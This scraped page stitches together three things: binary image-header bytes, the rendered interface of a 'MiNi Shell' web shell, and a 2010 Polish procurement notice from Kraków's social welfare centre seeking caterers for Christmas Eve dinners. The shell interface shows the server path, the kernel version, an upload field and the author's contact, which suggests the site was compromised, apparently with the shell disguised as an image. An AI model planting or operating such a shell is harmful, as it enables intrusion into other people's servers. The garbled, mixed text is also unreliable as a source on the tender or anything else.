JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101112/321045-N-2010.html

<p class="kh_header"><b>Kraków: przygotowanie wieczerzy wigilijnych dla uczestników projektów MOPS</b><br>
<b>Numer ogłoszenia: 321045 - 2010; data zamieszczenia: 12.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przygotowanie wieczerzy wigilijnych dla uczestników projektów MOPS.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Organizacja spotkania wigilijnego na potrzeby projektu socjalnego Filii 9 Radość życia, zgodnie z poniższymi wytycznymi:
1)	usługa obejmuje przygotowanie, dostarczenie i serwowanie w czasie trwania projektu posiłków dla uczestników projektu Radość życia
2)	Wykonawca zapewnia posiłek, zastawę stołową, serwis kelnerski.
3)	Menu dla 1 osoby:
a)	dania gorące z bufetu (do wyboru)
- barszcz czerwony (250ml) z pasztecikiem (150g)
- karp smażony z grzybami (150g)
- kapusta z grzybami (150g)
b)	zimny bufet
- śledź po królewsku (60g)
- kulebiak z kapustą i grzybami (70g)
c)	sałatki - 200g
- ziemniaczana ze śledziem
- pieczarkowa
d)	przekąski koktajlowe - mix (4szt - 200g) 
- roladki naleśnikowe z pastą z łososia
- kruche babeczki z krewetkami w curry
- pieczarki faszerowane serem blue
- tartinki z tuńczykiem i zieloną oliwką
e)	bufet słodki (200g)
- strucla makowa
- piernik staropolski z bakaliami
f)	napoje
 - gorące: kawa, herbata, kompot z suszu - bez ograniczeń
- zimne: soki owocowe, woda mineralna - bez ograniczeń
g)	pieczywo - bez ograniczeń
h)	cukier - bez ograniczeń
4)	Miejsce realizacji:  w lokalu zapewnionym przez Zamawiającego
a)	os. Na Stoku (w godz.14.00-16.00) dla  65 osób
b)	os. Wzgórza Krzesławckie (w godz. 15.30-17.00) dla 45 osób
5)	Termin realizacji:  13.12.2010
6)	Ilość osób: 110



II część zamówienia
Organizacja spotkania wigilijnego na potrzeby projektu socjalnego Filii 2 Szansa - przy wigilijnym stole i Spotkanie międzypokoleniowe przy stole wigilijnym 2010r, zgodnie z poniższymi wytycznymi:
1)	usługa obejmuje przygotowanie, dostarczenie i serwowanie w czasie trwania projektu posiłków dla uczestników projektu 
2)	Wykonawca zapewnia posiłek, ceramiczną zastawę stołową i dekorację świąteczną oraz serwis kelnerski.
3)	Menu dla 1 osoby:
 	- barszcz czerwony (350ml) z uszkami grzybowymi (8szt)
		- filet z karpia smażony w panierce (150g)
		- chleb krojony pszenny (150g)
		- pierogi z kapustą i grzybami (8szt)
		- ryba po grecku (150g)
		- kutia (100g)
		- kompot z suszu (250ml)
		- kawa lub herbata (250 ml)
		- Ciasto (kruche ciasteczka, sernik, strucla z makiem) (350g)
		- cukier - bez ograniczeń
4)	Miejsce realizacji:  w lokalu zapewnionym przez Zamawiającego - Dom weselny Astelia ul. Radzikowskiego 51
5)	Termin realizacji:  17.12.2010 w godz. 15.00-18.00
6)	Ilość osób: 100


III część zamówienia
Organizacja spotkania wigilijnego na potrzeby projektu socjalnego Filii 3 Jest Taki Dzień II, zgodnie z poniższymi wytycznymi:
1)	usługa obejmuje przygotowanie, dostarczenie i serwowanie w czasie trwania projektu posiłków dla uczestników projektu 
2)	Wykonawca zapewnia salę odpowiedniej wielkości, w lokalu na terenie Dzielnicy XIII Miasta Krakowa, z dogodnym dojazdem środkami komunikacji miejskiej, do której w czasie trwania spotkania nie będą miały wstępu osoby postronne. Wystrój sali - stosownie do okoliczności: na stołach białe obrusy, świece wraz ze stroikiem świątecznym, z siankiem i opłatkiem oraz z zastawą ceramiczną. Wykonawca zapewni również odpowiednią oprawę muzyczną - kolędy, i obsługę kelnerską.
3)	Menu dla 1 osoby:
 	- barszcz czerwony z uszkami (470g)
		- ryba panierowana (150g)
		- surówka z czerwonej kapusty (200g)
		- ziemniaki (200g)
		- kapusta z grochem (200g)
		- pierogi z kapustą i grzybami (300g)
		- makaron z makiem (200g)
		- gołąbek w sosie grzybowym (250g)
		- sałatka jarzynowa (150g)
		- kompot z suszu (250g)
		- ciasto 2 rodzaje (200g)
		- kawa lub herbata (250ml)
		- cukier - bez ograniczeń
		- sok owocowy (300ml)
		- cytrusy, banany (0,5 kg)

5)	Termin realizacji:  20.12.2010 w godz. 15.00-18.00
6)	Ilość osób: 20

IV część zamówienia
Organizacja spotkania wigilijnego na potrzeby projektu Filii 4 Spotkanie wigilijne dla Emerytów i Rencistów z Dzielnicy XVIII, zgodnie z poniższymi wytycznymi:
1)	usługa obejmuje przygotowanie, dostarczenie i serwowanie w czasie trwania projektu posiłków dla uczestników projektu.
2)	Wykonawca zapewnia posiłek, zastawę stołową i dekorację oraz serwis kelnerski.
3)	Menu dla 1 osoby:
 	- zupa pieczarkowa z łazankami (500ml)
		- ryba (120g)
		- surówka (150g)
		- pieczywo (100g)
4)	Miejsce i termin realizacji:
a)	14.12.2010 w godz. 12.00 - 14.00 - os. Szkolne 5 - dla 25 osób
b)	14.12.2010 w godz. 16.00 -  18.00 - os. Centrum A 6a - 55 osób
c)	16.12.2010 w godz. 12.00 -  14.00 - os. Chałupki - 70 osób
d)	16.12.2010 w godz. 16.30 -  18.30 - os. Zgody 1 - 50 osób
e)	20.12.2010 w godz. 14.00 -  16.00 - os. Górali 4 - 85 osób
5)	Ilość osób: 285


V część zamówienia
Organizacja spotkania wigilijnego na potrzeby projektu socjalnego Filii 5 Wieczerza wigilijna, zgodnie z poniższymi wytycznymi:
1)	Usługa obejmuje: organizacje wieczerzy wigilijnej dla 80 osób oraz przygotowanie 20 posiłków na wynos z dowozem do miejsca zamieszkania klientów (teren Dzielnicy VIII)
2)	Wykonawca zapewnia salę odpowiedniej wielkości, w lokalu na terenie Dzielnicy VIII Miasta Krakowa, z dogodnym dojazdem środkami komunikacji miejskiej, do której w czasie trwania spotkania nie będą miały wstępu osoby postronne. Wystrój sali - stosownie do okoliczności: na stołach białe obrusy, świece wraz ze stroikiem świątecznym, z siankiem i opłatkiem oraz z zastawą ceramiczną. Wykonawca zapewni również odpowiednią oprawę muzyczną - kolędy i obsługę kelnerską.
3)	Menu dla 1 osoby:
Spotkanie wigilijne w lokalu
		- żurek z grzybami i jajkiem (300ml)
		- karp smażony z pieczarkami (180g)
		- ziemniaki z wody posypane koperkiem (200g) 
		- kapusta czerwona (120g)
		- pierogi ruskie (330g)
		- kompot z suszonych owoców (250ml)
		- kawa lub herbata (250ml)
		- cukier (10g)
		- mleko (30ml)
		- sernik (150g)
		- kosze pieczywa wiejskiego - bez ograniczeń
		- na wynos dla każdego uczestnika kapusta z grochem (330g)

Menu na wynos z dowozem 
		- karp smażony z pieczarkami (180g)
		- ziemniaki z wody posypane koperkiem (200g)
		- kapusta czerwona (120g)
		- pierogi ruskie (330g)
		- sernik (150g)
		- kapusta z grochem (330g)
5)	Termin realizacji:  20.12.2010 w godz.12.00-15.00
6)	Ilość osób w lokalu: 80
7)	Ilość osób z dowozem: 20


VI część zamówienia
Organizacja spotkania wigilijnego na potrzeby projektu socjalnego Filii 7 Z kulturą na Ty, zgodnie z poniższymi wytycznymi:
1)	usługa obejmuje przygotowanie, dostarczenie i serwowanie w czasie trwania projektu posiłków dla uczestników projektu.
2)	Wykonawca zapewnia salę odpowiedniej wielkości, w lokalu na terenie Dzielnicy V lub VII Miasta Krakowa, z dogodnym dojazdem środkami komunikacji miejskiej, do której w czasie trwania spotkania nie będą miały wstępu osoby postronne. Wystrój sali - stosownie do okoliczności, na stołach białe obrusy, świece wraz ze stroikiem świątecznym, z siankiem i opłatkiem oraz z zastawą ceramiczną. Wykonawca zapewnia również obsługę kelnerską w trakcie spotkania.
3)	Menu dla 1 osoby:
 	- śledź po japońsku (160g)
		- pieczywo (100g)
		- barszcz z uszkami (300ml)
		- ryba panierowana - panga (130g)
		- ziemniaki (200g)
		- zestaw surówek /por, kapusta czerwona, seler/ (200g)
		- ciasto /sernik, miodownik królewski/ (200g)
		- kompot z suszu owocowego (200ml)
		- kawa biała (200ml)
		- herbata z cytryną (200ml)
 5)	Termin realizacji:  23.12.2010 w godz. 15.00-19.00
6)	Ilość osób: 52.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.12.00-0, 55.32.10.00-6, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak: termin realizacji zamówienia, podwykonawcy, warunki płatności oraz miejsce realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie ul.Jżóefińska 14 pok 012.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2010 godzina 12:00, miejsce: Dziennik Podawczy MOPS Kraków ul.Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com